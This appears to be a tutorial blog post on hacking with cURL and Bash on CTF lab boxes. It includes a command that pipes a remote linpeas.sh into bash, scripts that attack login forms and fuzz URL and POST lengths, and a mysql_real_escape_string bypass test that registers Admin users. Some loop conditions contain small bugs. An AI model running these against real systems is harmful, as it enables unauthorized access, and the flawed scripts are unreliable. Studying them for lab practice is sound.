Hacking With cURL

A list of examples and references of hacking with Bash and the Curl command.

What the heck is cURL?

cURL is short for "Client URL" and is a computer software project providing a library (libcurl) and command-line tool (curl) first released in 1997. It is a free client-side URL transfer library that supports the following protocols: Cookies, DICT, FTP, FTPS, Gopher, HTTP/1, HTTP/2, HTTP POST, HTTP PUT, HTTP proxy tunneling, HTTPS, IMAP, Kerberos, LDAP, POP3, RTSP, SCP, and SMTP Although attack proxies like BurpSuitePro are very handy tools, cURL allows you to get a bit closer to the protocol level, leverage bash scripting and provides a bit more flexibility when you are working on a complex vulnerability.

cURL GET parameters

HTTP GET variables can be set by adding them to the URL.

$ curl http://10.10.10.10/index.php?sessionid=vn0g4d94rs09rgpqga85r9bnia

cURL POST parameters

HTTP POST variables can be set using the -d (--data) parameter.
Here is a simple login test example:

$ curl --data "[email protected]&password=test" http://10.10.10.10/login.php

cURL COOKIEs

cURL has an entire cookie engine that can be used to store and load cookies passed to it from a server between sessions:

$ curl -b oldcookies.txt -c newcookies.txt http://10.10.10.10/login.php

You can also specify your own cookies using the -b parameter:

$ curl -b "PHPSESSID=vn0g4d94rs09rgpqga85r9bnia" http://10.10.10.10/home.php

cURL User Agents

$ curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" http://10.10.10.10/login.php

cURL Save the server response to a file

$ curl -o payload.sh http://10.10.10.10/payload.sh

cURL download a file to the current folder

$ curl -O http://10.10.10.10/payload.zip

cURL follow HTTP/1.1 302 Found redirects

curl -L http://10.10.10.10/profile.php

cURL Output Response Headers to STDOUT

$ curl -i http://10.10.10.10/profile.php

cURL view verbose debugging information (response headers and other debug details - STD2)

$ curl -v http://10.10.10.10/profile.php

Hacking with cURL

Now that we have covered the basic syntax and use cases, here are some practical hacking applications that are very helpful on Hackthebox or CTF boxes.

Using cURL to pipe a remote scipt (linpeas.sh) directly to bash:

$ curl -sSk "http://10.10.10.10/linpeas.sh" | bash

Attacking a Login Form with cURL

$ curl --data "[email protected]&password=test" http://10.10.10.10/login.php

Creating new users with cURL

$ curl --data "name=test&[email protected]&password=test" http://10.10.10.10/newuser.php

Fuzzing Web Servers with cURL

Often we performing an assessment against a webserver, we will attempt to trigger error conditions which will provide some deeper insights into the underlying processes and software. cURL can be a powerful fuzzing tool for generating these edge case error messages.

Fuzzing with URI length / GET parameter length limits with cURL

The following script can be used to fuzz a webserver with a long URL track the changes in output and write the output to a file. It is meant to be a basic scaffold for you to build a fit for purpose fuzzer using cURL and Bash. You can modify the url to either fuzz a URI or a GET parameter.

Here is the bash shell script:

#!/bin/bash
echo "args: <URL> <Start Length #> <End Length #> <Output Filepath>"
echo "Length Lines Words Bytes Filename"
echo "---------------------------------"
for ((i = $2; x <= $3; i++))
do
        fuzz=""
        for ((x = 1; x <= $i; x++))
        do
                fuzz+="A"
        done
        #echo "COUNT: $i $fuzz"
        #echo "${1}${fuzz}"
        echo "${i}" | { tr -d '\n' ; curl "${1}${fuzz}" -o ${4} 2>/dev/null | wc ${4}; }
done

Here is an example of what it looks like running:

./fuzz_url.sh http://10.10.10.10/ 1000 1000000 output.txt
args: <URL> <Start Length #> <End Length #> <Output Filepath>
Length Lines Words Bytes Filename
---------------------------------
1000 9  31 274 output.txt
...
...
100000 11  37 343 output.txt
100001 11  37 343 output.txt
100002 11  37 343 output.txt
100003 11  37 343 output.txt
100004 11  37 343 output.txt
100005 11  37 343 output.txt

Fuzzing POST parameter length limits with cURL

The following script can be used to fuzz a webserver POST parameters and write the output to a file and track changes to that output. It is meant to be a basic scaffold for you to build a fit for purpose fuzzer using cURL and Bash.

Here is the bash shell script:

#!/bin/bash
echo "args: <URL> <Start Length #> <End Length #> <Output Filepath> <Post data: var=value&var2=valuefuzz>"
echo "Length Lines Words Bytes Filename"
echo "---------------------------------"
for ((i = $2; x <= $3; i++))
do
        fuzz=""
        for ((x = 1; x <= $i; x++))
        do
                fuzz+="A"
        done
        #echo "COUNT: $i $fuzz"
        #echo "${5}${fuzz}"
        echo "${i}" | { tr -d '\n' ; curl "${1}" -o ${4} -d "${5}${fuzz}" 2>/dev/null | wc ${4}; }
done

Here is an example of what it looks like running:

./fuzz_post.sh http://10.10.10.10/ 1000 1000000 output.txt "user=test&password=test"
args: <URL> <Start Length #> <End Length #> <Output Filepath>
Length Lines Words Bytes Filename
---------------------------------
1000 9  31 274 output.txt
...
...
100000 11  37 343 output.txt
100001 11  37 343 output.txt

Check to see if a user login is correct in a Bash script

The following script can be used to verify that a username and login is correct. It is meant to be a basic scaffold for you to build a fit for purpose fuzzer using cURL and Bash. It will check the response length characters to see if it is a valid response. You will need to adjust the expected character count for your application.

#!/bin/bash
result=($(curl --data "email=$2&password=$3" "$1" 2>/dev/null | wc -c))
echo $result
if [ "$result" == '0' ]
then
        echo 'zero'
else
        echo 'NOT zero'
fi

Here is the script in action:

$ ./check_user.sh http://10.10.10.10/login.php [email protected] testpassword
0
NOT zero

Automate user creation and test for mysql_real_escape_string bypass

The following is a basic scaffold for you to build a fit for purpose fuzzer using cURL and Bash. Here is a bash script I created for a CTF to validate a theory I had about its use of the PHP mysql_real_escape_string method:

#!/bin/bash
# Test for mysql_real_escape_string
[email protected]
password=1234567890123456789012345678901234567890123456789012345678901234567890123456789
fuzz="뽜’’AA"
name="‘¿’’AA"
ip="10.10.10.10"
echo "Creating User: ${email}"
curl -i -b 'cookies.txt' -c 'cookies.txt' -d "name=${name}&email=${email}&password=${password}&type=Admin" "http://${ip}/index.php" 2>/dev/null
echo " "
echo "============================================"
echo "Login as User"
echo "============================================"
curl -i -c 'cookies.txt' -d "email=${email}&password=${password}&type=Admin" "http://${ip}/index.php" 2>/dev/null  | grep 'location'
echo " "
echo "============================================"
echo "Check user profile with cookie"
echo "============================================"
curl -b 'cookies.txt' "http://${ip}/index.php" -v 2>/dev/null | grep 'td align="center"'
echo " " 
echo "============================================"
echo "Change Name"
echo "============================================"
curl -b 'cookies.txt' -d "name=${fuzz}&type=Admin" "http://${1}/index.php" 
echo " " 
curl -b 'cookies.txt' "http://${ip}/profile.php" 2>/dev/null | grep 'td align="center"'
echo " "
echo " DELETEING COOKIE "
rm cookies.txt
echo "============================================"
echo "Relogin as User - did password change?"
echo "============================================"
curl -i -c 'cookies.txt' -d "email=${email}&password=${password}&type=Admin" "http://${ip}/index.php"  2>/dev/null  | grep 'location'
echo " " 
echo " DONE!"
echo " DELETEING COOKIE "
rm cookies.txt